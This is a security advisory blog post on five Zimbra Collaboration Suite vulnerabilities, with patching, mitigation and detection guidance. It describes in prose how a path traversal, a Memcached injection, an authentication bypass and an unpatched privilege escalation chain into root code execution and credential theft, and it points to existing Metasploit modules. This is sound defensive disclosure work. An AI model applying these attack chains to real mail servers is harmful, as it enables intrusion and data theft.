Last updated at Fri, 26 Aug 2022 20:41:55 GMT
Over the past few weeks, five different vulnerabilities affecting Zimbra Collaboration Suite have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the latest version on an urgent basis, and to upgrade future versions as quickly as possible once they are released.
Exploited RCE vulnerabilities
The following vulnerabilities can be used for remote code execution and are being exploited in the wild.
CVE-2022-30333 is a path traversal vulnerability in
unRAR, Rarlab’s command line utility for extracting RAR file archives. CVE-2022-30333 allows an attacker to write a file anywhere on the target file system as the user that executes
unrar. Zimbra Collaboration Suite uses a vulnerable implementation of
unrar (specifically, the
amavisd component, which is used to inspect incoming emails for spam and malware). Zimbra addressed this issue in 9.0.0 patch 25 and 8.5.15 patch 32 by replacing
Our research team has a full analysis of CVE-2022-30333 in AttackerKB. A Metasploit module is also available. Note that the server does not necessarily need to be internet-facing to be exploited — it simply needs to receive a malicious email.
CVE-2022-27924 is a blind Memcached injection vulnerability first analyzed publicly in June 2022. Successful exploitation allows an attacker to change arbitrary keys in the Memcached cache to arbitrary values. In the worst-case scenario, an attacker can steal a user’s credentials when a user attempts to authenticate. Combined with CVE-2022-27925, an authenticated remote code execution vulnerability, and CVE-2022-37393, a currently unpatched privilege escalation issue that was publicly disclosed in October 2021, capturing a user’s password can lead to remote code execution as the root user on an organization’s email server, which frequently contains sensitive data.
Our research team has a full analysis of CVE-2022-27924 in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for any user by stacking multiple requests.
CVE-2022-27925 is a directory traversal vulnerability in Zimbra Collaboration Suite Network Edition versions 8.8.15 and 9.0 that allows an authenticated user with administrator rights to upload arbitrary files to the system. (Note that Open Source Edition does not have that endpoint and is therefore not vulnerable.) On August 10, 2022, security firm Volexity published findings from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 without authentication.
Note: Although the public advisories don't mention it, our testing indicated that Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable
mboximport endpoint). Vulnerable versions are:
- Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
- Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
Our research team has a full analysis of CVE-2022-27925 in AttackerKB.
Unpatched privilege escalation CVE-2022-37393
In October of 2021, researcher Darren Martyn published an exploit for a zero-day root privilege escalation vulnerability in Zimbra Collaboration Suite. When successfully exploited, the vulnerability allows a user with a shell account as the
zimbra user to escalate to root privileges. While this issue requires a local account on the Zimbra host, the previously mentioned vulnerabilities in this blog post offer plenty of opportunity to obtain it.
Our research team tested the privilege escalation in combination with CVE-2022-30333 at the end of July 2022, as well as the fully patched version on August 17, 2022, and found that all versions of Zimbra were affected through at least 9.0.0 P26 and 8.8.15 P33. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned CVE-2022-37393 (still awaiting NVD analysis) to track it. A full analysis of CVE-2022-37393 is available in AttackerKB. A Metasploit module is also available.
We strongly advise that all organizations who use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring Zimbra’s release communications for future security updates, and patching on an urgent basis when new versions become available.
The AttackerKB analyses for CVE-2022-30333, CVE-2022-27924, CVE-2022-27925, and CVE-2022-37393 all include vulnerability details (including proofs of concept) and sample indicators of compromise (IOCs). Volexity’s blog also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published lists of valid JSP files included in Zimbra installations for the latest version of 8.8.15 and of 9.0.0 (at time of writing).
Finally, we recommend blocking internet traffic to Zimbra servers wherever possible and configuring Zimbra to block external Memcached, even on patched versions of Zimbra.
Vulnerability checks for all five Zimbra CVEs are available via a content-only update as of August 18, 3pm ET.
InsightIDR: Customers should look for alerts generated by InsightIDR’s built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:
- Suspicious Process - Zimbra Collaboration Suite Webserver Spawns Script Interpreter
- Suspicious Process - “Zimbra” User Runs Shell or Script Interpreter
The Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.